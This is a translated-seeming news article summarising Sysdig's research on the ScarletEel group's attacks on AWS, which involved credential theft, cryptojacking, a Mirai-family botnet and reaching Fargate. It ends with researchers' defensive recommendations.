Amazon Web Services (AWS) threatened by ScarletEel hackers

ScarletEel hackers were able to break into the AWS cloud to steal credentials and intellectual property, and perform cryptojaking, DDoS, and more. AWS responds with a major update.

Researchers observed ScarletEel hackers infiltrating Amazon Web Services (AWS) to steal credentials and intellectual property, install crypto mining software, perform distributed denial-of-service (DDoS) attacks, and more .

The hacker was first revealed in a February blog post from cloud security company Sysdig . ScarletEel has proven itself proficient with AWS tools , so much so that it plugs into the cloud environment and uses native AWS functionality to move around with ease, performing a double whammy: installing crypto mining software and also stealing intellectual properties.

ScarletEel also continues to refine its tactics, according to the company’s latest analysis, it manages to evade cloud security detection mechanisms and reach the AWS Fargate calculation engine. It has also expanded its arsenal by adding DDoS-as-a-service to its list of intrusion and exploitation techniques.

“So, compared to their previous activity, we see that they are more aware of the victim’s environment and they have improved their capabilities in terms of where to go, how to exploit it and how to evade security measures defenses that customers have already started implementing,” says Alessandro Brucato, threat research engineer for Sysdig.

ScarletEel began its latest intrusion by exploiting Jupyter notebook containers in a Kubernetes cluster, then the hackers ran scripts to look for AWS credentials that they could send to their command-and-controll (C2) server. Essentially instead of using command line tools, the scripts used the shell’s builtin commands. “This is a less visible way to exfiltrate data since curl and wget, which many tools monitor, are not used,” the researchers pointed out.

ScarletEel also used Pacu, an open source tool for AWS, to discover a privilege escalation opportunity in the victim’s account. At the same time, he used Peirates, an equivalent tool to explore and exploit the victim’s Kubernetes environment.

To disguise their activity, hackers have devised an ingenious defense mechanism.

“Instead of dealing directly with AWS, they were using a Russian server that supports the AWS protocol ,” explains Michael Clark, director of threat research for Sysdig . The Living off the land attack with native AWS commands masks the maliciousness of the activity while simultaneously not being logged in the victim’s AWS CloudTrail logs, because it all happened on the Russian site.

As Sysdig wrote in February, ScarletEel’s main goals are to steal proprietary software and perform cryptojacking .

Recently, hackers abandoned 42 instances of crypto mining done via a compromised account, which created so much noise that they were quickly detected and shut down, but the attackers were not scared and even after being discovered, they still attempted to use other accounts new and compromised but failed due to lack of privileges.

The researchers estimated that if the attack continued unabated, it would yield approximately $4,000 per day in cryptomining rewards .

In addition to IP theft and cryptojacking , the group also installed malware belonging to the Mirai family of botnets (Mirai is one of the most famous botnets in the world, having been around since the mid-2010s) called “Pandora”. The researchers hypothesized that hackers would use Pandora-infected devices as a separate, larger part of a DDoS-as-a-service campaign.

“Ordinary” cloud security may not be a match for an attacker so comfortable in these environments, for example, in his most recent activity, ScarletEel’s increased capabilities allowed him to reach Fargate, the AWS platform for running serverless containers.

Fargate is largely uncharted territory for both hackers and those needing to defend themselves because, Clark explains, “it is often not publicly accessible. It is used for many internal and back-end purposes, which means that it is not really considered as part of their attack surface.”

He adds: “But as we saw with this attack, they ended up on the Fargate system and took the credentials from it. So they’re definitely aware of the opportunities that are in that space, and it’s just a matter of time before they get there.”

To protect yourself against an entity like ScarletEel, Brucato explained, “you have to first implement some measures to prevent hackers from entering in your environment. But if they can do it anyway – because now they’re getting more and more sophisticated – you also have to implement effective runtime security.” Clark highlights the value of effective cloud security posture management (CSPM) and user rights management. cloud infrastructure (CIEM) .

«It is not enough to protect yourself in just one way because attackers today are truly aware», concludes Brucato. “They can exploit any other detail.”